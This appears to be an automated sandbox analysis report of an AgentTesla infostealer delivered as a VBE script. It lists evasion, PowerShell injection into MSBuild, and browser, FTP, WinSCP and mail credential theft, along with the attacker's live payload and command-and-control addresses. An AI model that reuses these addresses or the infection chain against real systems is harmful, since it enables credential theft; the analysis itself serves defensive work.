                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4568Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6192Thread sleep count: 1260 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -99828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6192Thread sleep count: 1900 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -99586s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -99482s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -99375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -99266s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -99156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -99047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -98937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -98828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -98719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -98595s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -98469s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -98360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -98235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -98110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99586Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99482Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99266Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98595Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: wscript.exe, 00000002.00000003.2625850909.000002E9486CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l
                  Source: wscript.exe, 00000000.00000003.2049305678.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048928477.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067149458.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2067955213.000002C0EB1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053612462.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066723786.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2066723786.000002C0EB1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2067050019.000002C0EB1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2053820937.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056025031.000002C0EB249000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048135478.000002C0EB249000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: wscript.exe, 00000002.00000003.2625850909.000002E9486CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\
                  Source: MSBuild.exe, 00000005.00000002.3312185912.0000000006375000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D90000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D90000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D92000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DCC000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DCE000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FBB008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5244" "2828" "2700" "2832" "0" "0" "2836" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 5.2.MSBuild.exe.d90000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3309367586.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3309367586.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3309367586.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2920, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 5.2.MSBuild.exe.d90000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3309367586.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2920, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 5.2.MSBuild.exe.d90000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3309367586.000000000302C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3309367586.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3306974664.0000000000D92000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3309367586.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2920, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information311
                  Scripting                  		Valid Accounts121
                  Windows Management Instrumentation                  		311
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		1
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  PowerShell                  		Logon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager111
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                  Virtualization/Sandbox Evasion                  		LSA Secrets141
                  Virtualization/Sandbox Evasion                  		SSHKeylogging23
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                  Process Injection                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591702 Sample: 0969686.vbe Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 28 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->28 30 s-part-0017.t-0009.t-msedge.net 2->30 32 2 other IPs or domains 2->32 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 7 other signatures 2->46 8 wscript.exe 1 2->8         started        11 wscript.exe 32 1 2->11         started        signatures3 process4 dnsIp5 56 Wscript starts Powershell (via cmd or directly) 8->56 58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->58 15 powershell.exe 43 8->15         started        38 144.91.79.54, 49704, 80 CONTABODE Germany 11->38 26 C:\Users\user\AppData\...\uaDoJtHubxengYS.vbs, ASCII 11->26 dropped 60 System process connects to network (likely due to code injection or exploit) 11->60 62 Potential evasive VBS script found (sleep loop) 11->62 64 Windows Shell Script Host drops VBS files 11->64 66 Suspicious execution chain found 11->66 file6 signatures7 process8 signatures9 68 Writes to foreign memory regions 15->68 70 Injects a PE file into a foreign processes 15->70 18 MSBuild.exe 15 2 15->18         started        22 wermgr.exe 19 15->22         started        24 conhost.exe 15->24         started        process10 dnsIp11 34 162.254.34.31, 49707, 587 VIVIDHOSTINGUS United States 18->34 36 api.ipify.org 104.26.13.205, 443, 49705 CLOUDFLARENETUS United States 18->36 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->48 50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->50 52 Tries to steal Mail credentials (via file / registry access) 18->52 54 2 other signatures 18->54 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  0969686.vbe5%VirustotalBrowse
                  0969686.vbe3%ReversingLabs

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://144.91.79.54/gYS0G0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/20%Avira URL Cloudsafe
                  http://144.91.79.54/2412/r0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/s0%Avira URL Cloudsafe
                  http://144.91.79.5K0%Avira URL Cloudsafe
                  http://144.91.79.54/0G0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/v0%Avira URL Cloudsafe
                  http://144.91.79.54/Indexz=n0%Avira URL Cloudsafe
                  http://144.91.79.54/ndex0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/regOwiR4EFZZGKetHoUY.txtP0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/file0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/cn0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/r40%Avira URL Cloudsafe
                  http://144.91.79.54/0%Avira URL Cloudsafe
                  http://144.91.79.54/ndexv=b0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/cn0%Avira URL Cloudsafe
                  http://144.91.79.54/?0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/regOwiR4EFZZGKetHoUY.txtshqos.dll0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/cnZ=N0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/vs0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/vJA0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/r.0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/regOwiR4EFZZGKetHoUY.txt0%Avira URL Cloudsafe
                  http://144.91.79.54/hell0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.210.172
                  		truefalse
                    		high
                    s-part-0017.t-0009.t-msedge.net
                    		13.107.246.45
                    		truefalse
                      		high
                      api.ipify.org
                      		104.26.13.205
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://144.91.79.54/2412/vwscript.exe, 00000000.00000003.2053401800.000002C0EB213000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://144.91.79.5Kwscript.exe, 00000000.00000003.2065837487.000002C0EB286000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
